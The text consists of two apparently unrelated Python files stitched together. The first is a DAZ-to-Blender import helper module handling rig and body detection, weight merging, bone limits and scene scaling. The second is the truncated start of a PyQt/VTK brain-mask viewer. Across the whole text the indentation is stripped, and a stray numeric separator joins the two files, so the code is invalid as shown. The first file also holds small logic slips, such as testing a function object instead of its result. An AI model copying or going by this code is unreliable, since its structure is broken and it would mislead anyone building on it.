hi = getBody().dimensions[2]
if hi < getBody().dimensions[1]:
hi = getBody().dimensions[1]
vgs = dobj.vertex_groups
for v in dobj.data.vertices:
if v.co[1] >= hi or v.co[2] >= hi:
count[0] += 1
for gp in v.groups:
vgname = vgs[gp.group].name.lower()
if "head" in vgname:
count[1] += 1
elif ("abdomen" in vgname) or ("forearm" in vgname):
count[1] -= 1
if count[0] > 10 and count[1] > 10:
_HAIR = dobj.name
return True
return False
def find_ENVROOT(dobj):
fromtop = []
frombtm = []
cname = Util.getUsersCollectionName(dobj)
objs = Util.colobjs(cname)
global _ENVROOT
if len(objs) == 1:
_ENVROOT = objs[0].name
return
for obj in objs:
find = False
while obj.parent is not None:
find = True
obj = obj.parent
if find == False:
fromtop.append(obj)
else:
if not (obj in frombtm):
frombtm.append(obj)
if (len(fromtop) == 1 and len(frombtm) == 1) == False:
return
if fromtop[0] != frombtm[0]:
return
if fromtop[0].type == "ARMATURE" or fromtop[0].type == "EMPTY":
_ENVROOT = fromtop[0].name
def getEnvRoot():
if _ENVROOT != "" and (_ENVROOT in Util.allobjs()):
return Util.allobjs().get(_ENVROOT)
def decide_HERO():
global _AMTR
global _RGFY
global _BODY
global _EYLS
global _TEAR
global _HAIR
global isMan
global isGen
global _BVCount
global _ISG3
global Geo_Idx
global _SIZE
clear_variables()
active_col_objs = Util.myacobjs()
# Find Armatures
exists = {"_AMTR": False, "_RGFY": False, "_BODY": False}
for dobj in active_col_objs:
if exists["_AMTR"] == False:
exists["_AMTR"] = find_AMTR(dobj)
if exists["_AMTR"]:
continue
if exists["_RGFY"] == False:
exists["_RGFY"] = find_RGFY(dobj)
if exists["_RGFY"]:
continue
# Needs to be Seperated as Rigify changes Order
for dobj in active_col_objs:
if exists["_BODY"] == False:
exists["_BODY"] = find_BODY(dobj)
if exists["_BODY"]:
continue
if "Male" in _BODY:
isMan = True
# Removed until found necessary
# if find_EYLS(dobj):
# continue
# if find_HAIR(dobj):
# continue
# if find_TEAR(dobj):
# continue
def store_variables():
global _AMTR
global _RGFY
global _BODY
global _EYLS
global _TEAR
global _HAIR
global isMan
global isGen
global _BVCount
global _ISG3
global Geo_Idx
global _SIZE
clear_variables()
active_col_objs = Util.myacobjs()
# Find Armatures
exists = {"_AMTR": False, "_RGFY": False, "_BODY": False}
for dobj in active_col_objs:
if exists["_AMTR"] == False:
exists["_AMTR"] = find_amtr(dobj)
if exists["_AMTR"]:
continue
if exists["_RGFY"] == False:
exists["_RGFY"] = find_RGFY(dobj)
if exists["_RGFY"]:
continue
# Needs to be Seperated as Rigify changes Order
for dobj in active_col_objs:
if exists["_BODY"] == False:
exists["_BODY"] = find_body(dobj)
if exists["_BODY"]:
continue
if "Male" in _BODY:
isMan = True
# Removed until found necessary
# if find_EYLS(dobj):
# continue
# if find_HAIR(dobj):
# continue
# if find_TEAR(dobj):
# continue
def addG3Database(isman):
sql = ""
if isman == False and len(DataBase.f_geni) == G3_GEOIDX - 1:
sql = "select SRC,DST from G3F order by SRC"
elif isman and len(DataBase.m_geni) == G3_GEOIDX - 1:
sql = "select SRC,DST from G3M order by SRC"
if sql == "":
return
con = getCon()
cur = con.cursor()
cur.execute(sql)
addtbl = []
for row in cur:
addtbl.append([row[0], row[1]])
if isman:
DataBase.m_geni.append(addtbl)
else:
DataBase.f_geni.append(addtbl)
cur.close()
con.close()
def getMf():
global Geo_Idx
global isMan
if getBody() is None:
return
rtn = [False, False, False]
verts = getBody().data.vertices
if getAmtr() is not None:
xr = getAmtr().rotation_euler[0]
else:
xr = 0
is_fst = xr > math.radians(88) and xr < math.radians(92)
if is_fst:
hi = getBody().dimensions[1]
hi = (hi * 9) / 10
else:
hi = getBody().dimensions[2]
hi = (hi * 8) / 10
tops = [[5358, 69, 3958, 79, 5534, 3], [5054, 69, 3733, 78, 5230, 3]] # 5345,5041,
for sex in range(2):
isMan = sex == 1
Geo_Idx = 0
if is_fst and ("Male" in getBody().name) and sex == 0:
continue
max = len(DataBase.f_geni) + 1
if isMan:
max = len(DataBase.m_geni) + 1
for i in range(max):
point = 0
tpast = 0
max3 = max_vs[sex][i]
# if (len(getBody().data.vertices) in max3)==False:
# continue
for tidx, t in enumerate(tops[sex]):
v = verts[t]
src_t = t
Geo_Idx = i
if i > 0:
t = toGeniVIndex(t)
v = verts[t]
vpast = verts[tpast]
if is_fst:
if v.co[1] > hi and v.co[0] < 0.3 and v.co[0] > -0.3:
if tidx == 0 or (tidx > 0 and v.co[2] > vpast.co[2]):
point += 1
else:
if v.co[2] > hi and v.co[0] < 0.3 and v.co[0] > -0.3:
if tidx == 0 or (tidx > 0 and v.co[1] < vpast.co[1]):
point += 1
tpast = t
if point == 6:
rtn[0] = sex == 1
rtn[1] = i > 0
rtn[2] = True
return rtn
Geo_Idx = 0
return rtn
def boneRotation_onoff(context, flg_on):
rig = context.active_object
if rig is None or rig.type != "ARMATURE":
return
for pb in rig.pose.bones:
for c in pb.constraints:
if c.name == "Limit Rotation":
c.mute = flg_on == False
def getRootPath():
global root
# if bpy.context.window_manager.use_custom_path:
# root = ""
# else:
if root == "":
hdir = os.path.expanduser("~")
hdir = os.path.join(
hdir, "Documents", "DAZ 3D", "Bridges", "Daz To Blender", "Exports"
)
print("Files Should be Exporting to : {0}".format(hdir))
if os.path.exists(hdir):
root = hdir
else:
root = ""
return root
def get_custom_path():
return bpy.context.scene.dtb_custom_path.path.replace("\\", "/")
def get_config_path():
global config
if config == "":
hdir = os.path.expanduser("~")
hdir = os.path.join(
hdir, "Documents", "DAZ 3D", "Bridges", "Daz To Blender", "Config"
)
if os.path.exists(hdir):
config = hdir
else:
config = ""
return config
def load_asset_name():
global _ASSETNAME
for file in os.listdir(getHomeTown()):
if file.endswith(".dtu"):
dtu = os.path.join(getHomeTown(), file)
break
with open(dtu, "r") as file:
_ASSETNAME = json.load(file)["Asset Name"]
def get_asset_name():
return _ASSETNAME
def clear_already_use_newmtl():
global already_use_newmtl
already_use_newmtl = []
def set_already_use_newmtl(newmtl):
global already_use_newmtl
already_use_newmtl.append(newmtl)
def is_already_use_newmtl(newmtl):
is_in = newmtl in already_use_newmtl
print("@@@", is_in, newmtl, already_use_newmtl)
return is_in
def setHomeTown(htown):
global _HOMETOWN
_HOMETOWN = htown
def getHomeTown():
return _HOMETOWN
def clear_variables():
global isMan
global isGen
global _AMTR
global _BODY
global _EYLS
global _TEAR
global _HAIR
global _RGFY
global keep_EYLS
global Geo_Idx
global _ISG3
global _SIZE
global IS_EMERGENCY
global _BVCount
global now_ary
global pst_ary
global _ENVROOT
global shape_key_custom_props
isMan = False
isGen = False
_AMTR = ""
_BODY = ""
_EYLS = ""
_HAIR = ""
_RGFY = ""
keep_EYLS = ""
Geo_Idx = 0
_ISG3 = 0
_SIZE = 0
_ENVROOT = ""
IS_EMERGENCY = False
_BVCount = 0
now_ary = []
pst_ary = []
shape_key_custom_props = []
# for scene in bpy.data.scenes:
# scene.unit_settings.scale_length = 1
def amIRigfy(cobj):
if cobj.type == "ARMATURE" and _RGFY == cobj.name:
return True
return False
def amIAmtr(cobj):
if cobj.type == "ARMATURE" and _AMTR == cobj.name:
return True
return False
def amIBody(cobj):
if cobj.type == "MESH" and _BODY == cobj.name:
return True
return False
def getHair():
for dobj in Util.allobjs():
if dobj.type == "MESH" and dobj.name == _HAIR:
return dobj
return None
def getBody():
for dobj in Util.allobjs():
if dobj.type == "MESH" and dobj.name == _BODY:
return dobj
return None
def getEyls():
for dobj in Util.allobjs():
if dobj.type == "MESH" and dobj.name == _EYLS:
return dobj
return None
def getTear():
for dobj in Util.allobjs():
if dobj.type == "MESH" and dobj.name == _TEAR:
return dobj
return None
def getRgfyBones():
rig = getRgfy()
if rig is not None:
return rig.data.bones
return None
def getRgfy():
for dobj in Util.allobjs():
if dobj.type == "ARMATURE" and dobj.name == _RGFY:
return dobj
return None
def setRgfy_name(newname):
global _RGFY
if getRgfy() is None:
return
getRgfy().name = newname
_RGFY = newname
def getAmtrBones():
rig = getAmtr()
if rig is not None:
return rig.data.bones
return None
def getAmtr():
for dobj in Util.allobjs():
if dobj.type == "ARMATURE" and dobj.name == _AMTR:
return dobj
return None
def getAmtrConstraint(bone_name, const_name):
if getAmtr is None:
return
pbone = getAmtr().pose.bones.get(bone_name)
if pbone is None:
return
for c in pbone.constraints:
if c.name == const_name:
return c
return None
def deselect():
for obj in Util.allobjs():
Versions.select(obj, False)
def toGeniVIndex(vidx):
old = 0
if Geo_Idx <= 0 or Geo_Idx >= 10:
return vidx
if getIsMan() == False:
for ridx, r in enumerate(DataBase.f_geni[Geo_Idx - 1]):
if vidx < r[0] and ridx > 0:
vidx -= old
break
old = r[1]
else:
for ridx, r in enumerate(DataBase.m_geni[Geo_Idx - 1]):
if vidx < r[0] and ridx > 0:
vidx -= old
break
old = r[1]
return vidx
def get_geo_idx():
return Geo_Idx
def getRig_id():
rig = getRgfy()
for d in rig.data:
if d.name == "rig_id":
return d.data["rig_id"]
def bone_limit_modify(bone_limits):
for bone_limit_key in bone_limits:
bone_limit = bone_limits[bone_limit_key]
name = bone_limit[0]
order = bone_limit[1]
prefix = name[0:1]
post_prefix = name[1:2]
bone_type = "none"
if prefix == "l" and post_prefix.isupper():
bone_type = "left"
elif prefix == "r" and post_prefix.isupper():
bone_type = "right"
else:
bone_type = "center"
do_conversion = True
if do_conversion and order == "XYZ":
# YZ switch (Y <-> Z)
for i in range(2):
temp = bone_limit[4 + i]
bone_limit[4 + i] = bone_limit[6 + i]
bone_limit[6 + i] = temp
# XY switch (X <-> Y)
for i in range(2):
temp = bone_limit[2 + i]
bone_limit[2 + i] = bone_limit[4 + i]
bone_limit[4 + i] = temp
if bone_type == "right":
# Y invert (-Y)
temp = 0 - bone_limit[5]
bone_limit[5] = 0 - bone_limit[4]
bone_limit[4] = temp
# Z invert (-Z)
temp = 0 - bone_limit[7]
bone_limit[7] = 0 - bone_limit[6]
bone_limit[6] = temp
elif do_conversion and order == "XZY":
# XY switch (X <-> Y)
for i in range(2):
temp = bone_limit[2 + i]
bone_limit[2 + i] = bone_limit[4 + i]
bone_limit[4 + i] = temp
# X invert (-X)
temp = 0 - bone_limit[3]
bone_limit[3] = 0 - bone_limit[2]
bone_limit[2] = temp
if bone_type == "right":
# Y invert (-Y)
temp = 0 - bone_limit[5]
bone_limit[5] = 0 - bone_limit[4]
bone_limit[4] = temp
# Z invert (-Z)
temp = 0 - bone_limit[7]
bone_limit[7] = 0 - bone_limit[6]
bone_limit[6] = temp
elif do_conversion and order == "YZX":
# Bones that are pointed down with YZX order
# TODO: remove hardcoding
if name in [
"hip",
"pelvis",
"lThighBend",
"rThighBend",
"lThighTwist",
"rThighTwist",
"lShin",
"rShin",
]:
# Y invert (-Y)
temp = 0 - bone_limit[5]
bone_limit[5] = 0 - bone_limit[4]
bone_limit[4] = temp
# Z invert (-Z)
temp = 0 - bone_limit[7]
bone_limit[7] = 0 - bone_limit[6]
bone_limit[6] = temp
elif do_conversion and order == "ZXY":
# XY switch (X <-> Y)
for i in range(2):
temp = bone_limit[2 + i]
bone_limit[2 + i] = bone_limit[4 + i]
bone_limit[4 + i] = temp
# YZ switch (Y <-> Z)
for i in range(2):
temp = bone_limit[4 + i]
bone_limit[4 + i] = bone_limit[6 + i]
bone_limit[6 + i] = temp
elif do_conversion and order == "ZYX":
# YZ switch (Y <-> Z)
for i in range(2):
temp = bone_limit[4 + i]
bone_limit[4 + i] = bone_limit[6 + i]
bone_limit[6 + i] = temp
# X invert (-X)
temp = 0 - bone_limit[3]
bone_limit[3] = 0 - bone_limit[2]
bone_limit[2] = temp
store_bone_limits(bone_limits)
return bone_limits
def store_bone_limits(bone_limits):
global updated_bone_limits
updated_bone_limits = bone_limits
def get_bone_limit():
return updated_bone_limits
def toMergeWeight(dobj, ruler_idx, slave_idxs):
setOpsMode("OBJECT")
Versions.active_object(dobj)
vgs = dobj.vertex_groups
for i, v in enumerate(dobj.data.vertices):
find = False
other_weight = 0.0
for s in slave_idxs:
if s < 0:
continue
for g in v.groups:
if g.group == s:
list = [i]
vgs[g.group].remove(list)
find = True
elif g.group != ruler_idx:
other_weight += g.weight
if find == True:
list = [i]
if other_weight > 0.0 and other_weight < 1.0:
vgs[ruler_idx].add(list, (1.0 - other_weight), "ADD")
else:
vgs[ruler_idx].add(list, 1.0, "ADD")
def toMergeWeight2(dobj, ruler_idx, slave_idxs, flg_half):
setOpsMode("OBJECT")
Versions.active_object(dobj)
vgs = dobj.vertex_groups
vw_ary = []
for vidx, v in enumerate(dobj.data.vertices):
for s in slave_idxs:
if s < 0:
continue
for g in v.groups:
wt = g.weight
if flg_half:
wt = wt / 2.0
if g.group == s:
list = [vidx]
for vw in vw_ary:
if vw[0] == vidx:
vw[1] += wt
wt = 0
if wt > 0:
vw_ary.append([vidx, wt])
vgs[g.group].remove(list)
for vw in vw_ary:
vgs[ruler_idx].add([vw[0]], vw[1], "ADD")
def toMergeWeight_str(dobj, ruler_name, slave_names, flg_head, flg_half):
Versions.select(dobj, True)
Versions.active_object(dobj)
ruler = -1
slave = []
vgs = dobj.vertex_groups
for vi, vg in enumerate(vgs):
if ruler_name == vg.name:
ruler = vi
else:
for sn in slave_names:
if sn in vg.name:
slave.append(vi)
break
if ruler >= 0 and len(slave) > 0:
if flg_head:
toMergeWeight2(dobj, ruler, slave, flg_half)
else:
toMergeWeight(dobj, ruler, slave)
def getFootAngle(r_l):
bones = ["hip", "pelvis", "ThighBend", "ThighTwist", "Shin", "Foot"]
kakudo3 = [[0, 0, 0, -1, 0, 0], [1, 2, 2, -1, 2, 1], [2, 1, -1, 1, 1, 2]]
minus3 = [[1], [0, 2, 4], [0]]
ans = [0, 0, 0]
flip_xyz = [0.0, 0.0, 0.0]
flip_value = 0.0
for i in range(3):
for bidx, bname in enumerate(bones):
if bidx >= 2:
if r_l == 0:
bname = "r" + bname
else:
bname = "l" + bname
if kakudo3[i][bidx] < 0:
continue
pb = getAmtr().pose.bones.get(bname)
if pb is None:
continue
rot = pb.rotation_euler[kakudo3[i][bidx]] * 57.3
for ms in minus3[i]:
if bidx == ms:
rot = 0 - rot
r = 0.0
# ThighBend
if bidx == 2:
# Fwd
if i == 0 and rot < 0:
r = math.fabs(rot)
if math.fabs(r) > 90:
r = 90
# Side
elif i == 1:
r = rot
flip_xyz[i] = r / 90.0
# ThighTwist Y
if bidx == 3 and i == 2:
flip_value = rot
ans[i] = ans[i] + rot
# Fwd
x = flip_value * flip_xyz[0]
if x < 0 and (math.fabs(ans[2] % 360) - x) >= 355:
x = -360 + ans[2] + 5
ans[2] -= x
ans[1] += x
# Side
y = flip_value * flip_xyz[1]
ans[0] += y
return ans
def ifNeedToSnapKnee(r_l):
poles = [getAmtr().pose.bones.get("rShin_P"), getAmtr().pose.bones.get("lShin_P")]
iks = [getAmtr().pose.bones.get("rShin_IK"), getAmtr().pose.bones.get("lShin_IK")]
k = iks[r_l].head[2] + iks[r_l].location[2]
return iks[r_l].head[2] > poles[r_l].head[2]
def get_size():
return float(bpy.context.window_manager.scene_scale)
def change_size(root):
if get_size() < 1:
# Scale Import
for i in range(3):
og_scale = root.scale[i]
root.scale[i] = og_scale * get_size()
setOpsMode("OBJECT")
Versions.active_object(root)
Versions.select(root, True)
bpy.ops.object.transform_apply(scale=True)
deselect()
for obj in Util.myacobjs():
if obj.type == "MESH":
if obj.parent == root:
Versions.select(obj, True)
Versions.active_object(obj)
bpy.ops.object.transform_apply(
location=True, rotation=True, scale=True
)
deselect()
elif obj.type == "LIGHT" or obj.type == "CAMERA":
for i in range(3):
og_scale = obj.scale[i]
obj.scale[i] = og_scale * get_size()
Versions.select(obj, True)
Versions.active_object(obj)
bpy.ops.object.transform_apply(scale=True)
deselect()
# Scale Daz_Pub
for d in Util.colobjs("DP"):
if d.type == "CAMERA" or d.type == "LIGHT":
og_location = (140, 100, 150)
for i in range(3):
d.location[i] = og_location[i] * get_size()
Versions.select(obj, True)
Versions.active_object(obj)
bpy.ops.object.transform_apply(scale=True)
deselect()
def float_by_size(float):
return float * get_size()
def scale_settings():
scene = bpy.context.scene
scene.tool_settings.use_keyframe_insert_auto = False
scene.unit_settings.system = "METRIC"
scene.unit_settings.scale_length = 1.0
if get_size() == 0.01:
scene.unit_settings.length_unit = "CENTIMETERS"
else:
scene.unit_settings.length_unit = "METERS"
# Change View Clipping
bpy.context.space_data.clip_start = get_size()
bpy.context.space_data.clip_end = 10000.00 * get_size()
bpy.context.space_data.lens = 50
location = [float_by_size(7.15), float_by_size(-4.35), float_by_size(100.0)]
rotation = [0.6888, 0.6246, 0.2473, 0.2727]
distance = float_by_size(430)
cam_ob = bpy.context.scene.camera
for area in bpy.context.screen.areas:
if area.type == "VIEW_3D":
rv3d = area.spaces[0].region_3d
if rv3d is not None:
rv3d.view_location = location
rv3d.view_rotation = rotation
rv3d.view_distance = distance
rv3d.view_camera_zoom = 0
rv3d.update()
viewport_data = rv3d
if cam_ob != None:
# Set Camera Position
cam_ob.matrix_world = viewport_data.view_matrix
cam_ob.matrix_world.invert()
# Set Camera Clipping
cam_ob.data.sensor_width = 64
cam_ob.data.clip_start = bpy.context.space_data.clip_start
cam_ob.data.clip_end = bpy.context.space_data.clip_end
bpy.context.preferences.inputs.use_mouse_depth_navigate = True
# Destroy old hierachy of the vertex groups
def convert_vgroups():
vgs = getBody().vertex_groups
setOpsMode("OBJECT")
Versions.active_object(getBody())
vidx = 0
total_vgs = len(vgs)
for vg in vgs:
if vg.name == "upperTeeth":
vg.name = "upperJaw"
elif vg.name == "LipLowerMiddle":
bpy.context.object.vertex_groups.active_index = vidx
bpy.context.object.vertex_groups[vidx].name = "lLipLowerMiddle"
bpy.ops.object.vertex_group_copy()
bpy.context.object.vertex_groups[total_vgs].name = "rLipLowerMiddle"
total_vgs += 1
elif vg.name == "CenterBrow":
bpy.context.object.vertex_groups.active_index = vidx
bpy.context.object.vertex_groups[vidx].name = "lCenterBrow"
bpy.ops.object.vertex_group_copy()
bpy.context.object.vertex_groups[total_vgs].name = "rCenterBrow"
total_vgs += 1
vidx += 1
half_liplower = [
["lLipLowerInner", ["lLipLowerMiddle"]],
["rLipLowerInner", ["rLipLowerMiddle"]],
]
for hl in half_liplower:
toMergeWeight_str(getBody(), hl[0], hl[1], True, True)
slave_rulers = [
["lowerJaw", ["lowerTeeth"]],
["tongue03", ["tongue04"]],
["lSquintInner", ["lNasolabialMiddle", "lNasolabialUpper"]],
["lNasolabialMouthCorner", ["lLipNasolabialCrease"]],
["lLipLowerOuter", ["lLipCorner"]],
]
for index, slave_ruler in enumerate(slave_rulers):
toMergeWeight_str(getBody(), slave_ruler[0], slave_ruler[1], True, False)
prefix = slave_ruler[0][0:1]
post_prefix = slave_ruler[0][1:2]
bone_type = "center"
if prefix == "l" and post_prefix.isupper():
bone_type = "left"
if bone_type == "left":
slave_ruler[0] = "r" + slave_ruler[0][1:]
for i in range(len(slave_ruler[1])):
slave_ruler[1][i] = "r" + slave_ruler[1][i][1:]
toMergeWeight_str(getBody(), slave_ruler[0], slave_ruler[1], True, False)
def mslot_to_vgroup(obj):
material_names = []
for index, slot in enumerate(obj.material_slots):
if not slot.material:
continue
verts = [
v
for f in obj.data.polygons
if f.material_index == index
for v in f.vertices
]
if len(verts):
vg = obj.vertex_groups.get(slot.material.name)
if vg is None:
vg = obj.vertex_groups.new(name=slot.material.name)
material_names.append(slot.material.name)
vg.add(verts, 1.0, "ADD")
return material_names
def finger(zindex):
keys = [
["Ring", "Mid", "Pinky", "Index", "Thumb"],
["f_ring", "f_middle", "f_pinky", "f_index", "thumb"],
]
if zindex == 0:
allbones = getAmtr().pose.bones
else:
allbones = getRgfy().pose.bones
for pb in allbones:
for k in keys[zindex]:
if (
zindex == 0
and pb.name[1:].startswith(k)
and len(pb.name) == len(k) + 2
and (pb.name.endswith("2") or pb.name.endswith("3"))
) or (
zindex == 1
and pb.name.startswith(k)
and len(pb.name) == len(k) + 5
and ((".02." in pb.name) or (".03." in pb.name))
):
find = False
for c in pb.constraints:
if c.name == "Copy Rotation":
mt = c.mute
c.mute = mt == False
find = True
break
if find:
break
cr = pb.constraints.new(type="COPY_ROTATION")
if zindex == 0:
cr.target = getAmtr()
length = len(pb.name)
starget = pb.name[: length - 1]
if pb.name.endswith("3"):
starget += "2"
else:
starget += "1"
else:
cr.target = getRgfy()
if ".03." in pb.name:
starget = pb.name.replace("3", "2")
elif ".02." in pb.name:
starget = pb.name.replace("2", "1")
cr.subtarget = starget
cr.use_x = k.lower() == "thumb"
cr.use_y = False
cr.use_z = k.lower() != "thumb"
Versions.mix_mode(cr)
cr.target_space = "LOCAL"
cr.owner_space = "LOCAL"
def getCon():
import sqlite3
cadr = os.path.join(os.path.dirname(__file__), "img", "dtb.sqlite")
con = sqlite3.connect(cadr)
return con
def get_symmetry(vidx, want_left):
if vidx <= 0:
return 0
tblName = "symmetry_"
if getIsMan():
tblName += "m"
else:
tblName += "f"
con = getCon()
cur = con.cursor()
if want_left:
sql = "select left from " + tblName + " where right = " + str(vidx)
else:
sql = "select right from " + tblName + " where left = " + str(vidx)
cur.execute(sql)
rtn = vidx
for row in cur:
rtn = row[0]
cur.close()
return rtn
def setRenderSetting(flg_high):
args = [[1, 12, 16, 260, "EXPERIMENTAL"], [2, 8, 2, 80, "SUPPORTED"]]
idx = 0 if flg_high else 1
bpy.context.scene.cycles.dicing_rate = args[idx][0]
bpy.context.scene.cycles.preview_dicing_rate = 8
bpy.context.scene.cycles.offscreen_dicing_scale = args[idx][1]
bpy.context.scene.cycles.max_subdivisions = args[idx][2]
bpy.context.scene.cycles.samples = args[idx][3]
bpy.context.scene.cycles.feature_set = args[idx][4]
class BoneRoop:
bones = []
vweights = []
def __init__(self, rootbone):
self.bones = []
self.vweights = []
self.find_bone_roop(getAmtr().data.bones[rootbone].children, rootbone)
def find_bone_roop(self, bone_group, rootbone):
for b in bone_group:
if len(b.children) > 0:
self.find_bone_roop(b.children, rootbone)
self.bones.append(b.name)
def getResultBones(self):
return self.bones
def getResultVertices(self):
vgs = getBody().vertex_groups
verts = getBody().data.vertices
for v in verts:
for g in v.groups:
if vgs[g.group].name in self.bones:
self.vweights.append(
[v.index, g.group, vgs[g.group].name, g.weight]
)
self.vweights.sort()
old_v = -1
sum = 0.0
rtn = []
for vw in self.vweights:
if old_v != vw[0]:
rtn.append([old_v, sum])
sum = 0.0
sum = sum + vw[3]
old_v = vw[0]
if sum > 0.0:
rtn.append([old_v, sum])
return rtn
|
456790
|
import math
import time
import os
import PyQt5.QtWidgets as QtWidgets
import PyQt5.QtCore as Qt
from vtk.qt.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor
from vtkUtils import *
from config import *
class MainWindow(QtWidgets.QMainWindow, QtWidgets.QApplication):
def __init__(self, app):
self.app = app
QtWidgets.QMainWindow.__init__(self, None)
# base setup
self.renderer, self.frame, self.vtk_widget, self.interactor, self.render_window = self.setup()
self.brain, self.mask = setup_brain(self.renderer, self.app.BRAIN_FILE), setup_mask(self.renderer,
self.app.MASK_FILE)
# setup brain projection and slicer
self.brain_image_prop = setup_projection(self.brain, self.renderer)
self.brain_slicer_props = setup_slicer(self.renderer, self.brain) # causing issues with rotation
self.slicer_widgets = []
# brain pickers
self.brain_threshold_sp = self.create_new_picker(self.brain.scalar_range[1], self.brain.scalar_range[0], 5.0,
sum(self.brain.scalar_range) / 2, self.brain_threshold_vc)
self.brain_opacity_sp = self.create_new_picker(1.0, 0.0, 0.1, BRAIN_OPACITY, self.brain_opacity_vc)
self.brain_smoothness_sp = self.create_new_picker(1000, 100, 100, BRAIN_SMOOTHNESS, self.brain_smoothness_vc)
self.brain_lut_sp = self.create_new_picker(3.0, 0.0, 0.1, 2.0, self.lut_value_changed)
self.brain_projection_cb = self.add_brain_projection()
self.brain_slicer_cb = self.add_brain_slicer()
# mask pickers
self.mask_opacity_sp = self.create_new_picker(1.0, 0.0, 0.1, MASK_OPACITY, self.mask_opacity_vc)
self.mask_smoothness_sp = self.create_new_picker(1000, 100, 100, MASK_SMOOTHNESS, self.mask_smoothness_vc)
self.mask_label_cbs = []
# create grid for all widgets
self.grid = QtWidgets.QGridLayout()
# add each widget
self.add_vtk_window_widget()
self.add_brain_settings_widget()
self.add_mask_settings_widget()
self.add_views_widget()
# set layout and show
self.render_window.Render()
self.setWindowTitle(APPLICATION_TITLE)
self.frame.setLayout(self.grid)
self.setCentralWidget(self.frame)
self.set_axial_view()
self.interactor.Initialize()
self.show()
@staticmethod
def setup():
"""
Create and setup the base vtk and Qt objects for the application
"""
renderer = vtk.vtkRenderer()
frame = QtWidgets.QFrame()
vtk_widget = QVTKRenderWindowInteractor()
interactor = vtk_widget.GetRenderWindow().GetInteractor()
render_window = vtk_widget.GetRenderWindow()
frame.setAutoFillBackground(True)
vtk_widget.GetRenderWindow().AddRenderer(renderer)
render_window.AddRenderer(renderer)
interactor.SetRenderWindow(render_window)
interactor.SetInteractorStyle(vtk.vtkInteractorStyleTrackballCamera())
# required to enable overlapping actors with opacity < 1.0
# this is causing some issues with flashing objects
# render_window.SetAlphaBitPlanes(1)
# render_window.SetMultiSamples(0)
# renderer.UseDepthPeelingOn()
# renderer.SetMaximumNumberOfPeels(2)
return renderer, frame, vtk_widget, interactor, render_window
def lut_value_changed(self):
lut = self.brain.image_mapper.GetLookupTable()
new_lut_value = self.brain_lut_sp.value()
lut.SetValueRange(0.0, new_lut_value)
lut.Build()
self.brain.image_mapper.SetLookupTable(lut)
self.brain.image_mapper.Update()
self.render_window.Render()
def add_brain_slicer(self):
slicer_cb = QtWidgets.QCheckBox("Slicer")
slicer_cb.clicked.connect(self.brain_slicer_vc)
return slicer_cb
def add_vtk_window_widget(self):
base_brain_file = os.path.basename(self.app.BRAIN_FILE)
base_mask_file = os.path.basename(self.app.MASK_FILE)
object_title = "Brain: {0} (min: {1:.2f}, max: {2:.2f}) Mask: {3}".format(base_brain_file,
self.brain.scalar_range[0],
self.brain.scalar_range[1],
base_mask_file)
object_group_box = QtWidgets.QGroupBox(object_title)
object_layout = QtWidgets.QVBoxLayout()
object_layout.addWidget(self.vtk_widget)
object_group_box.setLayout(object_layout)
self.grid.addWidget(object_group_box, 0, 2, 5, 5)
# must manually set column width for vtk_widget to maintain height:width ratio
self.grid.setColumnMinimumWidth(2, 700)
def add_brain_settings_widget(self):
brain_group_box = QtWidgets.QGroupBox("Brain Settings")
brain_group_layout = QtWidgets.QGridLayout()
brain_group_layout.addWidget(QtWidgets.QLabel("Brain Threshold"), 0, 0)
brain_group_layout.addWidget(QtWidgets.QLabel("Brain Opacity"), 1, 0)
brain_group_layout.addWidget(QtWidgets.QLabel("Brain Smoothness"), 2, 0)
brain_group_layout.addWidget(QtWidgets.QLabel("Image Intensity"), 3, 0)
brain_group_layout.addWidget(self.brain_threshold_sp, 0, 1, 1, 2)
brain_group_layout.addWidget(self.brain_opacity_sp, 1, 1, 1, 2)
brain_group_layout.addWidget(self.brain_smoothness_sp, 2, 1, 1, 2)
brain_group_layout.addWidget(self.brain_lut_sp, 3, 1, 1, 2)
brain_group_layout.addWidget(self.brain_projection_cb, 4, 0)
brain_group_layout.addWidget(self.brain_slicer_cb, 4, 1)
brain_group_layout.addWidget(self.create_new_separator(), 5, 0, 1, 3)
brain_group_layout.addWidget(QtWidgets.QLabel("Axial Slice"), 6, 0)
brain_group_layout.addWidget(QtWidgets.QLabel("Coronal Slice"), 7, 0)
brain_group_layout.addWidget(QtWidgets.QLabel("Sagittal Slice"), 8, 0)
# order is important
slicer_funcs = [self.axial_slice_changed, self.coronal_slice_changed, self.sagittal_slice_changed]
current_label_row = 6
# data extent is array [xmin, xmax, ymin, ymax, zmin, zmax)
# we want all the max values for the range
extent_index = 5
for func in slicer_funcs:
slice_widget = QtWidgets.QSlider(Qt.Qt.Horizontal)
slice_widget.setDisabled(True)
self.slicer_widgets.append(slice_widget)
brain_group_layout.addWidget(slice_widget, current_label_row, 1, 1, 2)
slice_widget.valueChanged.connect(func)
slice_widget.setRange(self.brain.extent[extent_index - 1], self.brain.extent[extent_index])
slice_widget.setValue(self.brain.extent[extent_index] / 2)
current_label_row += 1
extent_index -= 2
brain_group_box.setLayout(brain_group_layout)
self.grid.addWidget(brain_group_box, 0, 0, 1, 2)
def axial_slice_changed(self):
pos = self.slicer_widgets[0].value()
self.brain_slicer_props[0].SetDisplayExtent(self.brain.extent[0], self.brain.extent[1], self.brain.extent[2],
self.brain.extent[3], pos, pos)
self.render_window.Render()
def coronal_slice_changed(self):
pos = self.slicer_widgets[1].value()
self.brain_slicer_props[1].SetDisplayExtent(self.brain.extent[0], self.brain.extent[1], pos, pos,
self.brain.extent[4], self.brain.extent[5])
self.render_window.Render()
def sagittal_slice_changed(self):
pos = self.slicer_widgets[2].value()
self.brain_slicer_props[2].SetDisplayExtent(pos, pos, self.brain.extent[2], self.brain.extent[3],
self.brain.extent[4], self.brain.extent[5])
self.render_window.Render()
def add_mask_settings_widget(self):
mask_settings_group_box = QtWidgets.QGroupBox("Mask Settings")
mask_settings_layout = QtWidgets.QGridLayout()
mask_settings_layout.addWidget(QtWidgets.QLabel("Mask Opacity"), 0, 0)
mask_settings_layout.addWidget(QtWidgets.QLabel("Mask Smoothness"), 1, 0)
mask_settings_layout.addWidget(self.mask_opacity_sp, 0, 1)
mask_settings_layout.addWidget(self.mask_smoothness_sp, 1, 1)
mask_multi_color_radio = QtWidgets.QRadioButton("Multi Color")
mask_multi_color_radio.setChecked(True)
mask_multi_color_radio.clicked.connect(self.mask_multi_color_radio_checked)
mask_single_color_radio = QtWidgets.QRadioButton("Single Color")
mask_single_color_radio.clicked.connect(self.mask_single_color_radio_checked)
